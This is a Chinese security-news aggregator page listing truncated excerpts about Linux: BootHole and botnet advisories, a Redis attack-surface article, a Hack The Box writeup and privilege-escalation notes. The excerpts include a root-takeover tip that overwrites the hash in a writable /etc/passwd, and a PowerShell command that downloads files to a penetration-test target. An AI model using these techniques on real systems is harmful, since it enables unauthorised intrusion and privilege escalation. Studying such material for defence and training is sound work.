记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

BootHole 安全启动存在严重漏洞,影响大量Linux和Window系统

2020年7月29日,Eclypsium研究人员在GRUB2引导程序中发现了一个漏洞并将其命名为“BootHole”(CVE-2020-10713),利用该漏洞可在启动进程中执行任意代码。攻击者可利用该漏洞安装持久且隐秘的bootkit或恶意引导程序来控制设备。目前绝大多数linux发行版系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。 GRUB2介绍 GRUB2全称GRand Unified Bootloader 2,统一引导加载程序,是来自GNU项目的操作系统启动程序。用于加载操作系统内核,然后将控制权转移到该内核。还可在计算机启动时选择希望运行的操作系统,解决同一台计算机上安装的多个操作系统的问题。 漏洞描述 Eclypsium研究人员在GRUB2引导程序中发现了一个漏洞并将其
发布时间:2020-08-03 17:32 | 阅读:2278 | 评论:0 | 标签:系统安全 BootHole Bootkit CVE-2020-10713 Linux window 恶意引导程序 漏洞

BootHole漏洞影响数十亿Windows和Linux设备

近日,研究人员在Secure Boot(安全启动)过程的核心组件中发现一个安全漏洞——BootHole,CVE编号为CVE-2020-10713。攻击者利用该漏洞可以修改启动加载过程。启动加载过程是在真实操作系统启动之前进行的,这一过程主要依靠启动加载器(bootloader),负责加载所有操作系统之上运行的计算机硬件组件的固件。BootHole是当下最流行的加载启动器组件GRUB2中的安全漏洞。GRUB2是大多数Linux 发行版的首选启动加载器,也是部分Windows、macOS和BSD系统的启动器。BOOTHOLE工作原理BootHole漏洞其实是Eclypsium研究人员今年早些时候发现的。完整技术细节参见https://www.eclyp
发布时间:2020-07-31 14:53 | 阅读:3508 | 评论:0 | 标签:漏洞 linux

Linux服务器遭遇挖矿蠕虫攻击,已有数千台服务器中招

Linux服务器遭遇挖矿蠕虫攻击,已有数千台服务器中招2020-07-30 18:52:08腾讯安全威胁情报中心检测到H2Miner挖矿蠕虫变种近期活跃。H2Miner是一个linux下的大型挖矿僵尸网络,已被发现通过多个高危漏洞入侵Linux系统,并利用漏洞在企业内网或云服务器中横向扩散。腾讯安全威胁情报中心已检测到数千台服务器中招,腾讯安全专家建议相关企业尽快排查服务器被入侵的情况,及时清除H2Miner挖矿蠕虫病毒。一、概述腾讯安全威胁情报中心检测到H2Miner挖矿蠕虫变种近期活跃。H2Miner是一个linux下的大型挖矿僵尸网络,已被发现通过多个高危漏洞入侵Linux系统,并利用漏洞在企业内网或云服务器中横向扩散。腾讯安全威胁情报中心已检测到数千台服务器中招,腾讯安全专家建议相关企业尽快排查服务器被
发布时间:2020-07-30 19:39 | 阅读:3114 | 评论:0 | 标签:linux 攻击

【高端培训报名】3位安全分析专家,与“Linux botnet/malware”正面对杠的经历!

2016年Mirai僵尸网络爆发,这种病毒以IoT设备为跳板,发动大规模DDoS攻击,先后引发了美国大断网、德国电信断网事件等一系列大规模网络安全事故。尽管病毒作者先后被抓捕,但是伴随其代码被作者公布,各种Mirai的变种相继出现。公布后的病毒代码犹如被开启的潘多拉魔盒,Mirai僵尸网络家族潜藏于互联网中,在过去4年的时间里,与庞大的互联网体系形成了诡异的共生状态,而由此引发的Miari家族攻击频繁发生,也成为了网络安全工作者的梦魇。面对攻击,一群安全“杠精”潜伏出动,在与病毒和安全事件的对抗中,他们潜心修炼出一整套“Linux botnet/malware从捕获到分析”的组合拳法。今天小编有幸采访到这个团队的成员和其他同事,3位安全分析专家 刘
发布时间:2020-07-30 16:02 | 阅读:2116 | 评论:0 | 标签:linux

linux常用命令

linux常用命令 (1)文本倒序 Linux文本行倒序排列6种方法 1. 命令方法: nl filename | sort -nr | cut -f2 这个方法很unix风格,使用多命令组合完成某种功能是典型的unix特点 单命令: 在linux下,首先想到的就是 tac命令 ,可将文本文件的文本行倒序排列输出 2. AWK方法: awk ‘{line[NR]=$0}END{for(i=NR;i>0;i–)print line}’ filename 这个利用了AWK的数组功能 3. PERL方法: perl -e ‘print reverse <>’ filename 4. SED方法 sed ‘1!G;h;$!d
发布时间:2020-07-27 13:57 | 阅读:3432 | 评论:0 | 标签:学习路上 linux

WatchBogMiner木马发起漏洞攻击,已控制上万台Linux服务器挖矿

WatchBogMiner木马发起漏洞攻击,已控制上万台Linux服务器挖矿2020-07-22 19:04:32腾讯安全威胁情报中心检测到针对Linux服务器进行攻击的WatchBogMiner变种挖矿木马。该木马利用Nexus Repository Manager、Supervisord、ThinkPHP等服务器组件的远程代码执行漏洞进行攻击,在失陷机器安装多种类型的持久化攻击代码,然后植入门罗币挖矿木马进行挖矿,腾讯安全专家根据木马使用的算力资源推测已有上万台Linux服务器被黑客控制。一、背景腾讯安全威胁情报中心检测到针对Linux服务器进行攻击的WatchBogMiner变种挖矿木马。该木马利用Nexus RepositoryManager、Supervisord、ThinkPHP等服务器组件的远程代
发布时间:2020-07-23 00:18 | 阅读:3738 | 评论:0 | 标签:漏洞 linux 攻击

Linux基础软件威胁疑云:从已知到“未知”

概要长久以来,Linux主机曾一直被认为是比Windows更安全的操作系统,已知病毒形势远没有Windows多样和严重。而近年随着云计算的兴起,Linux系统在云主机的高占比形成了联网主机的主要算力,自然而然地吸引了病毒、黑产的注意力。但对Linux恶意程序攻防的研究仍未达到Windows同等程度,由公众所认识到的Linux恶意程序基本以挖矿程序和DDoS木马为主。在对云上海量主机文件进行巡检和安全分析过程中发现,尽管考虑到Linux开源生态天然的版本分化因素,Linux的大量基础软件存在超出正常现象的碎片化现象。分析的基础软件包括操作系统基础程序,如ps、kill、netstat等;以及服务类基础应用软件,如Apache httpd、Nginx、
发布时间:2020-07-22 11:33 | 阅读:2286 | 评论:0 | 标签:linux

Linux提权总结

Linux提权总结0x01 利用内核栈溢出利用已知的漏洞,如脏牛等。0x02 密码提权首先需要介绍两个文件 /etc/passwd 和 /etc/shadow1. /etc/passwdpasswd 文件储存了用户的具体信息,全用户可读,root可写daemon:x:1:1:daemon:/usr/sbin:/bin/sh由冒号分割,第一列是用户名(daemon);第二列是密码,x表示密码的hash值保存在shadow文件中第三列是UID第四列是GID第五列是用户全名或本地账号第六列是home目录第七列是登录之后使用的终端命令passwd文件是可写的,如果将密码X替换成我们自己的hash,就可以改变目标的root密码2. /etc/shad
发布时间:2020-07-17 12:29 | 阅读:3314 | 评论:0 | 标签:提权 linux

【高端培训报名中】大牛神操作!带你刷爆Linux malware/botnet捕获分析全过程!

过去几年,我们见证了Linux malware/botnet的蓬勃发展,一些常见的家族名也逐渐为大家所熟悉,比如XORDDOS、BillGates、Gafgyt、Mirai等。这其中以2016年出现的Mirai最令人印象深刻。它不仅拥有极强的破坏力,还制造出了使Dyn/Twitter和德国电信断网的大新闻,其僵尸网络的规模甚至突破了数十万的超高量级。正是Mirai的强大破坏力,人们才更加清晰的认识到原来互联网上有如此多不安全的Linux设备,它们主要是网络摄像头和家用路由器这类IoT设备,由于自身防御能力低但网络带宽充足,因此一旦被黑客控制便会产生不可估量的严重后果。受Mirai“成功故事”的启发,更多的黑产从业者将目光瞄准网上的Linux设备尤其
发布时间:2020-07-14 11:41 | 阅读:3154 | 评论:0 | 标签:linux

浅析Linux下Redis的攻击面(一)

浅析Linux下Redis的攻击面(一)0x0 前言  Redis在内网渗透中常常扮演着重要的角色,其攻击方式非常多样化,在内网复杂的环境架构中容易出现各种问题,那么如何有效利用Redis的缺陷来达到我们的目的呢,这里笔者结合一些实操场景和大师傅们的文章做了一些分析和总结。0x1 Redis的简介官方简介: Introduction to Redis我的理解:Redis是C语言开发一个开源(遵循BSD)协议高性能的(key-value)键值对的内存NoSQL数据库,可以用作数据库、缓存、信息中间件(性能非常优秀,支持持久化到硬盘且高可用),由于其自身特点,可以广泛应用在数据集群,分布式队列,信息中间件等网络架构中,在内网渗透的突破中,常常扮
发布时间:2020-07-13 12:33 | 阅读:5483 | 评论:0 | 标签:linux 攻击

windows/LINUX版本php5.3.3下载地址

WIN地址: https://windows.php.net/downloads/releases/archives/ linux地址: https://museum.php.net/php5/ apache下载地址 http://archive.apache.org/dist/httpd/     httpd.conf 添加 AddType application/x-httpd-php .php yum install libxml2* -y yum -y install libevent libevent-devel  
发布时间:2020-07-03 18:50 | 阅读:8792 | 评论:0 | 标签:学习路上 linux

亡命徒(Outlaw)僵尸网络感染约2万台Linux服务器,腾讯安全提醒企业及时清除

亡命徒(Outlaw)僵尸网络感染约2万台Linux服务器,腾讯安全提醒企业及时清除2020-07-01 15:38:32腾讯安全威胁情报中心检测到国内大量企业遭遇亡命徒(Outlaw)僵尸网络攻击。该僵尸网络最早于2018年被发现,其主要特征为通过SSH爆破攻击目标系统,同时传播基于Perl的Shellbot和门罗币挖矿木马。一、背景腾讯安全威胁情报中心检测到国内大量企业遭遇亡命徒(Outlaw)僵尸网络攻击。亡命徒(Outlaw)僵尸网络最早于2018年被发现,其主要特征为通过SSH爆破攻击目标系统,同时传播基于Perl的Shellbot和门罗币挖矿木马。腾讯安全威胁情报中心安全大数据显示,亡命徒(Outlaw)僵尸网络已造成国内约2万台Linux服务器感染,影响上万家企业。此次攻击传播的母体文件为dota
发布时间:2020-07-01 16:35 | 阅读:6007 | 评论:0 | 标签:linux 僵尸网络

windows/Linux文件下载方式汇总

文章前言在渗透过程中,通常会需要向目标主机传送一些文件,来达到权限提升、权限维持等目的,本篇文章主要介绍一些windows和Linux下常用的文件下载方式。windows命令行自带工具PowerShellPowerShell是一种跨平台的任务自动化和配置管理框架,由命令行管理程序和脚本语言组成,与大多数接受并返回文本的 shell 不同,PowerShell构建在 .NET公共语言运行时 (CLR) 的基础之上,接受并返回.NET对象,这从根本上的改变引入了全新的自动化工具和方法。远程下载文件到本地:powershell (new-object System.Net.WebClient).DownloadFile('http://192.1
发布时间:2020-07-01 12:41 | 阅读:10068 | 评论:0 | 标签:linux

Hack The Box - Postman Writeup - Linux

0x00 前言懒了,原本要保证每个月至少输出一篇blog,翻了翻做的笔记,不是不能拿出来讲的就是片段化的知识点,要是往外发的话,还要加工下,直线刷HTB的时候写了点writeup,稍微整理下发出来了。0x01 渗透思路整理一下撸这个靶机的思路:1. 6379 redis未授权访问漏洞写公钥2. 翻目录找到Matt用户的私钥,john爆破出密码,redis用户su过去到Matt用户,拿到用户权限3. 利用Webmin的洞,配合Matt的登录凭证拿到root权限,over0x02 Hack The Box Postman WriteupIP:10.10.10.1601234567891011121314151617181920212223242526272829303132333435363738394041424
发布时间:2020-06-30 22:07 | 阅读:8872 | 评论:0 | 标签:linux

对Linux 提权的简单总结

m0nk3y@D0g3本文为在我打了9个Vulnhub靶机后,感觉到提权操作及思路,方法有点欠缺的一篇总结性学习笔记(内容均参考自网络和个人整理,文末注明来源。若有错误之处,希望师傅们指正。笔记基本上参考下面这篇文章(有些地方可以说是直接翻译过来的,据说是提权圣经(时间比较久远了,不过核心思想不变,非常有参考价值:https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/什么是权限在Linux 系统中,ls -al 即可查看列出文件所属的权限。这里我用kali 系统来演示。……drwxr-xr-x 2 kali kali 4096 Jan 27 12:52 D
发布时间:2020-06-30 13:50 | 阅读:13201 | 评论:0 | 标签:提权 linux

Linux僵尸网络最新变种现身:Docker服务器惨遭殃及

研究人员近期发现了2个攻击Docker服务器的Linux僵尸网络的变种,分别是XORDDoS 恶意软件和Kaiji DDoS恶意软件。将Docker 服务器作为目标是XORDDoS和 Kaiji恶意软件的新变化,之前这两款恶意软件的目标是云系统中的Linux 主机。最近Kaiji首次被曝影响物联网设备。攻击者常常使用僵尸网络在扫描了SSH 和Telnet端口后执行暴力破解攻击。这两款恶意软件也搜索了暴露2375 端口的Docker服务器。2375端口是Docker API使用的一个端口,用于非加密或非认证的通信。这两个恶意软件变种的攻击方法有明显的差异。XORDDoS 攻击会利用Docker服务器来感染服务器上的容器,而Kaiji 攻击会在感染的服
发布时间:2020-06-29 15:16 | 阅读:8627 | 评论:0 | 标签:linux 僵尸网络

公告

学习黑客技术,传播黑客文化

推广

工具

标签云